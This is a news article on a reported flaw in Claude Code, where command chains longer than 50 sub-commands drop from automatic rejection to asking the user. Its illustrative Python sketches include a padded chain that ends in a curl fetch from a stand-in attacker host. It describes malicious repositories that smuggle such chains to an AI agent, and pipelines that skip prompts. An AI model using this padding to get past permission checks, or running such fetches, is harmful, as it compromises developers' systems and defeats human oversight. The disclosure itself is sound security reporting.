Adversa, an Israeli security firm, recently disclosed a critical vulnerability in Claude Code, the development tool built by AI giant Anthropic. Researchers found that when the tool receives too many sub-commands at once, its built-in security interception rules stop being enforced.
The root cause is a hard-coded limit in the code: the system defines an internal "maximum safe-check sub-commands" constant, fixed at 50.
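The reported behavior can be illustrated with a minimal sketch. All names here (the constant, the high-risk list, the function) are hypothetical stand-ins, not Anthropic's actual implementation; the sketch only models the described logic: a chain under the cap is fully checked, while a chain over the cap falls back from automatic rejection to asking the user.

```python
# Illustrative model of the reported flaw; names are hypothetical,
# not Claude Code's real internals.
MAX_SAFE_CHECK_SUBCOMMANDS = 50  # the reported hard-coded limit

# Hypothetical list of high-risk commands (e.g. network requests).
HIGH_RISK = {"curl", "wget", "nc"}

def check_command_chain(subcommands):
    """Return 'deny', 'ask', or 'allow' for a chain of sub-commands."""
    if len(subcommands) > MAX_SAFE_CHECK_SUBCOMMANDS:
        # Chain too long to analyze: instead of failing closed,
        # the checker downgrades to prompting the user.
        return "ask"
    if any(cmd.split()[0] in HIGH_RISK for cmd in subcommands):
        return "deny"  # automatic rejection of high-risk operations
    return "allow"

# A high-risk command in a short chain is auto-rejected...
short_chain = ["echo ok"] * 49 + ["curl http://attacker.example/payload"]
print(check_command_chain(short_chain))   # deny

# ...but padding the chain past the cap bypasses the auto-rejection.
padded_chain = ["echo ok"] * 50 + ["curl http://attacker.example/payload"]
print(check_command_chain(padded_chain))  # ask
```

The padding step is the whole attack: the attacker adds harmless filler sub-commands until the checker gives up on automatic analysis.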

A simple overflow attack can bypass the defense
Under normal conditions, Claude Code automatically intercepts high-risk operations, such as network requests, according to its security settings. But once an instruction chain exceeds 50 sub-commands, the system downgrades from "automatic rejection" to "asking the user."
Attackers can exploit this behavior by hiding long instruction chains in malicious code repositories, prompting the AI to execute dangerous commands. The system still pops up a warning, but developers in long working sessions often click "allow" out of habit, and the system is compromised.
Security experts advise applying the patch as soon as possible
Security experts point out that this counter-failure vulnerability is especially dangerous in automated integration (CI/CD) environments: in non-interactive mode, a pipeline may be configured to skip permission prompts by default and grant the AI execution permissions directly.
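Why the downgrade is worse in CI/CD can be sketched as follows. The function and its behavior are assumptions for illustration only: the point is that an "ask" outcome needs a human, and a non-interactive pipeline with permissive defaults may resolve it to "allow" with nobody watching.

```python
# Hypothetical sketch: how an "ask" decision could be auto-resolved
# in a non-interactive CI/CD run. Not Claude Code's actual logic.
import sys

def resolve_decision(decision, interactive=None):
    """Resolve a checker decision, accounting for whether a user is present."""
    if interactive is None:
        # Detect whether we are attached to a terminal.
        interactive = sys.stdin.isatty()
    if decision == "ask" and not interactive:
        # A pipeline configured to skip permission prompts turns
        # "ask" into "allow" with no human in the loop.
        return "allow"
    return decision

print(resolve_decision("ask", interactive=True))   # ask  (user is prompted)
print(resolve_decision("ask", interactive=False))  # allow (prompt skipped)
```

Combined with the counter overflow above the cap, this means a high-risk command that would normally be auto-rejected can run in a pipeline without any prompt ever being shown.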
